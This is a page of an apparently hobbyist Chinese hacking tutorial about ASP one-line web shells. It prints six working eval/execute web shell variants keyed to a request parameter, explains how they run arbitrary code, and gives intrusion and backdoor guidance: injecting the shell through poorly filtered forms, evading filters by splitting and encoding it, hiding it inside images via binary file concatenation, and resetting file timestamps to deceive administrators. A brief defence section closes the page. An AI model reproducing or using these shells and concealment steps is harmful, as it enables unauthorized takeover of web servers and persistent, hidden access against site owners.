后面的一些代码都是一些使用说明，提供六个服务端

以下是代码片段： 1. <%eval request("fk")%> 2. <%execute request("fk")%> 3. <%execute(request("fk"))%> 4. <%On Error Resume Next%><%eval request("fk")%> 5. <script language=VBScript runat=server>execute request("fk")</Script> 6. <script language=VBScript runat=server>eval request("fk")</Script>

大家试着用
解释以下：
        在VBScript 中，x = y可以有两种解释。第一种方式是赋值语句，将y的值赋予x。第二种解释是测试x 和y是否相等。如果相等，result为True；否则result为False。Eval方法总是采用第二种解释，而Execute语句总是采用第一种。

        Execute 执行一个或多个指定的语句，我们用来执行asp代码，它可以执行赋值操作，不过当POST的参数x为空时execute函数会出错，所以要加一句容错语句

        Eval 计算一个表达式的值并返回结果，它的参数可以是包含任何有效VBScript表达式的字符串，也就可以执行asp代码，但它不能执行赋值操作，不过当参数为空不会出错

Request 对象在 HTTP 请求期间，检索客户端浏览器传递给服务器的值这里是fk

        好，现在大家都知道了各个函数的意思，那我就把一句话木马的工作原理给大家讲一下：通过服务端的request('fk')的作用是读取客户端文件中第一个文本框中的内容(name值被命名为lygf的部分),然后通过Execute函数或eval函数执行其内容，之后的过程我都在上面说明了，写入大马，就得到了我们想要的webshell

二：应用篇

下面我们就来谈谈一句话asp木马的应用，大家应该都回用吧！哈哈

        1.入侵：把一句话插入任何以asp结尾的文件中就能实现入侵。网上很多程序中或者是留言本或者是评论或者是申请表单等等吧，凡是想服务器提交数据的页面只要存在着数据过滤不严，可以插入一句话，大多都能入侵。但我们首先需要做的是，要确认它的数据库必须是以asp结尾的，并且要知道它的数据库路径。如果失败了，大家要自己找一下原因：可能是一句话被包围在一个函数内了(结束它)，可能是被过滤<% %>，那大家就可以选择第四个服务端，还有我们可以吧一句话拆分，URLENCODE转换，代码加密等等，大家自由发挥吧！改了文件后要用海洋把文件最后修改时间改回去，这样可以骗过一些管理员！哈哈

        2.后门：用它做后门简直太爽了，平时我们用的木马用专业的asp木马查找工具都是可以轻而易举的查出来的，用它做后门就不容易查处来了，因为它可以变形啊，拆分，URLENCODE转换，代码加密等等。可以把它放在asp网页的页首、页尾，不过可能导致页面不正常，容易被发现；可以放在asp页面的空函数内，实验了可以用，页面也正常；可以放在任何文件里面(图片、文本、压缩文件等)，建议用图片，因为数量多，不易被发现，把它插入到图片后在一个asp页面中写入<!--#include file="***/****.***" -->后面省略的是你插入的文件的地址,也可以用copy命令使图片与asp文件合二为一copy 1.gif /b + asp.asp /a asp.gif参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。还有很多期待发现的方法，只要能想就能做，心有多大世界就有多大，哈哈(比如一台主机我们可以给它架设IIS或微型IIS，后用一句话留后门，一句化在加上系统、只读、隐藏的属性，把文件夹放深一点，就差不多了)。改了文件后要用海洋把文件最后修改时间改回去，这样可以骗过一些管理员！哈哈

三：防范篇

1.是要隐藏网站的数据库，不要让攻击者知道数据库文件的链接地址，把数据库放深一点，名字起的奇怪一点。

2.防止暴库，在数据库连接文件中加入容错代码、设置好IIS转向错误页面等

3.防止用户提交的数据未过滤漏洞，对用户提交的数据进行过滤，替换一些危险的代码等，比较好的方法就是过滤<>,现在TX就过滤这个东西，导致我们不能DIY了

       另外要注意的是：因为一句话木马调用了Adodb.Stream组件所以如果服务器端禁止Adodb.Stream组件是不会写入成功的！还有就是权限的问题，如果当前的虚拟目录禁止user组或者everyone写入操作的话那么也是不会成功的，不过这种情况很少见，一般都会有写的权限的！


但愿本文对你有所帮助，大家也可以到我的博客与我讨论，祝愿大家都能DIY出自己的一句话！

上一页  [1] [2] [3]